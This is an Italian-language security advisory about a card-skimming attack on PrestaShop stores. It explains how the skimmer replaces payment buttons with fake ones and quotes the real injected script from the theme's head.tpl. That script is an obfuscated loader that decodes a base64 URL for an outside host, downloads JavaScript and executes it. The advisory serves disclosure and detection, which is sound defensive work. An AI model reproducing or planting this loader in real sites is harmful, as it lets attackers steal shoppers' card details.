Abbiamo recentemente identificato una minaccia alla sicurezza che colpisce alcuni negozi online all'interno dell'ecosistema PrestaShop. È stato rilevato uno script dannoso ("skimmer digitale") che potrebbe aver portato al furto delle informazioni di pagamento dei clienti.
Questo malware funziona sostituendo i pulsanti di pagamento legittimi nella pagina di pagamento con pulsanti fraudolenti. Quando un cliente clicca su uno di questi pulsanti falsi, viene reindirizzato a un modulo di pagamento contraffatto, progettato per catturare i dati della sua carta di credito.
Lo skimmer viene semplicemente caricato tramite un tag <script> , scritto direttamente all'interno del file _partials/head.tpl del tema attivo dello store. Ciò significa che l'attaccante è riuscito a modificare un file dello store. All'interno del tag script, è possibile trovare il seguente codice:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
La parte aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz cambia ogni volta, ma la struttura del codice rimane la stessa e la funzione atob() viene sempre utilizzata. È possibile trovare del codice prima o dopo (lo skimmer cerca di nascondersi presentando un aspetto leggermente diverso in ogni negozio).
A questo punto, ti consigliamo vivamente di eseguire un controllo di sicurezza approfondito dei tuoi negozi PrestaShop e di assicurarti che nessuno di essi sia stato compromesso
